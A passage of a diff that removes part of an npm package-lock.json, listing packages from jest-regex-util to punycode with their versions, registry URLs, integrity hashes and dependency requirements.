{} - }, - "jest-regex-util": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.6.3.tgz", - "integrity": "sha512-KJJBsRCyyLNWCNBOvZyRDnAIfUiRJ8v+hOBQYGn8gDyF3UegwiP4gwRR3/SDa42g1YbVycTidUF3rKjyLFDWbg==", - "dev": true - }, - "jest-resolve": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.7.0.tgz", - "integrity": "sha512-IOVhZSrg+UvVAshDSDtHyFCCBUl/Q3AAJv8iZ6ZjnZ74xzvwuzLXid9IIIPgTnY62SJjfuupMKZsZQRsCvxEgA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.7.0", - "jest-validate": "^29.7.0", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.7.0.tgz", - "integrity": "sha512-un0zD/6qxJ+S0et7WxeI3H5XSe9lTBBR7bOHCHXkKR6luG5mwDDlIzVQ0V5cZCuoTgEdcdwzTghYkTWfubi+nA==", - "dev": true, - "requires": { - "jest-regex-util": "^29.6.3", - "jest-snapshot": "^29.7.0" - } - }, - "jest-runner": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.7.0.tgz", - "integrity": "sha512-fsc4N6cPCAahybGBfTRcq5wFR6fpLznMg47sY5aDpsoejOcVYFb07AHuSnR0liMcPTgBsA3ZJL6kFOjPdoNipQ==", - "dev": true, - "requires": { - "@jest/console": "^29.7.0", - "@jest/environment": "^29.7.0", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.7.0", - "jest-environment-node": "^29.7.0", - "jest-haste-map": "^29.7.0", - "jest-leak-detector": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-resolve": "^29.7.0", - "jest-runtime": "^29.7.0", - "jest-util": "^29.7.0", - "jest-watcher": "^29.7.0", - "jest-worker": "^29.7.0", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.7.0.tgz", - "integrity": "sha512-gUnLjgwdGqW7B4LvOIkbKs9WGbn+QLqRQQ9juC6HndeDiezIwhDP+mhMwHWCEcfQ5RUXa6OPnFF8BJh5xegwwQ==", - "dev": true, - "requires": { - "@jest/environment": "^29.7.0", - "@jest/fake-timers": "^29.7.0", - "@jest/globals": "^29.7.0", - "@jest/source-map": "^29.6.3", - "@jest/test-result": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-mock": "^29.7.0", - "jest-regex-util": "^29.6.3", - "jest-resolve": "^29.7.0", - "jest-snapshot": "^29.7.0", - "jest-util": "^29.7.0", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - } - }, - "jest-snapshot": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.7.0.tgz", - "integrity": "sha512-Rm0BMWtxBcioHr1/OX5YCP8Uov4riHvKPknOGs804Zg9JGZgmIBkbtlxJC/7Z4msKYVbIJtfU+tKb8xlYNfdkw==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.7.0", - "@jest/transform": "^29.7.0", - "@jest/types": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.7.0", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.7.0", - "jest-get-type": "^29.6.3", - "jest-matcher-utils": "^29.7.0", - "jest-message-util": "^29.7.0", - "jest-util": "^29.7.0", - "natural-compare": "^1.4.0", - "pretty-format": "^29.7.0", - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.7.0.tgz", - "integrity": "sha512-z6EbKajIpqGKU56y5KBUgy1dt1ihhQJgWzUlZHArA/+X2ad7Cb5iF+AK1EWVL/Bo7Rz9uurpqw6SiBCefUbCGA==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.7.0.tgz", - "integrity": "sha512-ZB7wHqaRGVw/9hST/OuFUReG7M8vKeq0/J2egIGLdvjHCmYqGARhzXmtgi+gVeZ5uXFF219aOc3Ls2yLg27tkw==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.6.3", - "leven": "^3.1.0", - "pretty-format": "^29.7.0" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.7.0.tgz", - "integrity": "sha512-49Fg7WXkU3Vl2h6LbLtMQ/HyB6rXSIX7SqvBLQmssRBGN9I0PNvPmAmCWSOY6SOvrjhI/F7/bGAv9RtnsPA03g==", - "dev": true, - "requires": { - "@jest/test-result": "^29.7.0", - "@jest/types": "^29.6.3", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.7.0", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.7.0.tgz", - "integrity": "sha512-eIz2msL/EzL9UFTFFx7jBTkeZfku0yUAyZZZmJ93H2TYEiroIx2PQjEXcwYtYl8zXCxb+PAmA2hLIt/6ZEkPHw==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.7.0", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "jose": { - "version": "5.9.6", - "resolved": "https://registry.npmjs.org/jose/-/jose-5.9.6.tgz", - "integrity": "sha512-AMlnetc9+CV9asI19zHmrgS/WYsWUwCn2R7RzlbJWD7F9eWYUTGyBmU9o6PxngtLGOiDGPRu+Uc4fhKzbpteZQ==", - "optional": true - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-4.1.0.tgz", - "integrity": "sha512-wpxZs9NoxZaJESJGIZTyDEaYpl0FKSA+FB9aJiyemKhMwkxQg63h4T1KJgUGHpTqPDNRcmmYLugrRjJlBtWvRA==", - "requires": { - "argparse": "^2.0.1" - } - }, - "jsbn": { - "version": "0.1.1", - "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-0.1.1.tgz", - "integrity": "sha1-peZUwuWi3rXyAdls77yoDA7y9RM=" - }, - "jsep": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/jsep/-/jsep-1.4.0.tgz", - "integrity": "sha512-B7qPcEVE3NVkmSJbaYxvv4cHkVW7DQsZz13pUMrfS8z8Q/BuShN+gcTXrUlPiGqM2/t/EEaI030bpxMqY8gMlw==" - }, - "jsesc": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-3.0.2.tgz", - "integrity": "sha512-xKqzzWXDttJuOcawBt4KnKHHIf5oQ/Cxax+0PWFG+DFDgHNAdi+TXECADI+RYiFUMmx8792xsMbbgXj4CwnP4g==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json-schema": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", - "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" - }, - "json-schema-traverse": { - "version": "0.4.1", - "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", - "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" - }, - "json-stringify-safe": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/json-stringify-safe/-/json-stringify-safe-5.0.1.tgz", - "integrity": "sha1-Epai1Y/UXxmg9s4B1lcB4sc1tus=" - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "jsonpath-plus": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/jsonpath-plus/-/jsonpath-plus-10.3.0.tgz", - "integrity": "sha512-8TNmfeTCk2Le33A3vRRwtuworG/L5RrgMvdjhKZxvyShO+mBu2fP50OWUjRLNtvw344DdDarFh9buFAZs5ujeA==", - "requires": { - "@jsep-plugin/assignment": "^1.3.0", - "@jsep-plugin/regex": "^1.0.4", - "jsep": "^1.4.0" - } - }, - "jsprim": { - "version": "1.4.2", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", - "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", - "requires": { - "assert-plus": "1.0.0", - "extsprintf": "1.3.0", - "json-schema": "0.4.0", - "verror": "1.10.0" - } - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lodash.memoize": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/lodash.memoize/-/lodash.memoize-4.1.2.tgz", - "integrity": "sha1-vMbEmkKihA7Zl/Mj6tpezRguC/4=", - "dev": true - }, - "make-dir": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-4.0.0.tgz", - "integrity": "sha512-hXdUTZYIVOt1Ex//jAQi+wTZZpUpwBj/0QsOzqegb3rGMMeJiSEu5xLHnYfBrRV4RH2+OCSOO95Is/7x1WJ4bw==", - "dev": true, - "requires": { - "semver": "^7.5.3" - }, - "dependencies": { - "semver": { - "version": "7.6.3", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", - "dev": true - } - } - }, - "make-error": { - "version": "1.3.6", - "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", - "integrity": "sha512-s8UhlNe7vPKomQhC1qFelMokr/Sc3AgNbso3n74mVPA5LTZwkB9NlXf4XPamLxJE8h0gh73rM94xvwRT2CVInw==", - "dev": true - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mime-db": { - "version": "1.52.0", - "resolved": "https://registry.npmjs.org/mime-db/-/mime-db-1.52.0.tgz", - "integrity": "sha512-sPU4uV7dYlvtWJxwwxHD0PuihVNiE7TyAbQ5SWxDCB9mUYvOgroQOwYQQOKPJ8CIbE+1ETVlOoK1UC2nU3gYvg==" - }, - "mime-types": { - "version": "2.1.35", - "resolved": "https://registry.npmjs.org/mime-types/-/mime-types-2.1.35.tgz", - "integrity": "sha512-ZDY+bPm5zTTF+YpCrAU9nK0UgICYPT0QtT1NZWFv4s++TNkcgVaT0g6+4R2uI4MjQjzysHB1zxuWL50hzaeXiw==", - "requires": { - "mime-db": "1.52.0" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "minipass": { - "version": "7.1.2", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-7.1.2.tgz", - "integrity": "sha512-qOOzS1cBTWYF4BH8fVePDBOO9iptMnGUEZwNc/cMWnTV2nVLZ7VoNWEPHkYczZA0pdoA7dl6e7FL659nX9S2aw==" - }, - "minizlib": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-3.0.1.tgz", - "integrity": "sha512-umcy022ILvb5/3Djuu8LWeqUa8D68JaBzlttKeMWen48SjabqS3iY5w/vzeMzMUNhLDifyhbOwKDSznB1vvrwg==", - "requires": { - "minipass": "^7.0.4", - "rimraf": "^5.0.5" - } - }, - "mkdirp": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-3.0.1.tgz", - "integrity": "sha512-+NsyUUAZDmo6YVHzL/stxSu3t9YS1iljliy3BSDrXJ/dkn1KYdmtZODGGjLcc9XLgVVpH4KshHB8XmZgMhaBXg==" - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.18", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.18.tgz", - "integrity": "sha512-d9VeXT4SJ7ZeOqGX6R5EM022wpL+eWPooLI+5UpWn2jCT1aosUQEhQP214x33Wkwx3JQMvIm+tIoVOdodFS40g==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "oauth-sign": { - "version": "0.9.0", - "resolved": "https://registry.npmjs.org/oauth-sign/-/oauth-sign-0.9.0.tgz", - "integrity": "sha512-fexhUFFPTGV8ybAtSIGbV6gOkSv8UtRbDBnAyLQw4QPKkgNlsH2ByPGtMUqdWkos6YCRmAqViwgZrJc/mRDzZQ==" - }, - "oauth4webapi": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/oauth4webapi/-/oauth4webapi-3.1.3.tgz", - "integrity": "sha512-dik5wEMdFL5p3JlijYvM7wMNCgaPhblLIDCZtdXcaZp5wgu5Iwmsu7lMzgFhIDTi5d0BJo03LVoOoFQvXMeOeQ==", - "optional": true - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "openid-client": { - "version": "6.1.3", - "resolved": "https://registry.npmjs.org/openid-client/-/openid-client-6.1.3.tgz", - "integrity": "sha512-74sc0bR4ptfwCwMheLPaJHTQnds+97Yu6O8eQgoO3MRcd53xkfKyl3gNAsRsYSYoO+AVG3eCgnRMjRkZ6n2RYw==", - "optional": true, - "requires": { - "jose": "^5.9.6", - "oauth4webapi": "^3.1.1" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "package-json-from-dist": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/package-json-from-dist/-/package-json-from-dist-1.0.1.tgz", - "integrity": "sha512-UEZIS3/by4OC8vL3P2dTXRETpebLI2NiI5vIrjaD/5UtrkFX/tNbwjTSRAGC/+7CAo2pIcBaRgWmcBBHcsaCIw==" - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==" - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - } - } - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha1-Ywn04OX6kT7BxpMHrjZLSzd8nns=" - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.8.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.8.0.tgz", - "integrity": "sha512-RIdOzyoavK+hA18OGGWDqUTsCLhtA7IcZ/6NCs4fFJaHBDab+pDDmDIByWFRQJq2Cd7r1OoQxBGKOaztq+hjIQ==" - }, - "punycode": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.1.1.tgz", - "integrity": 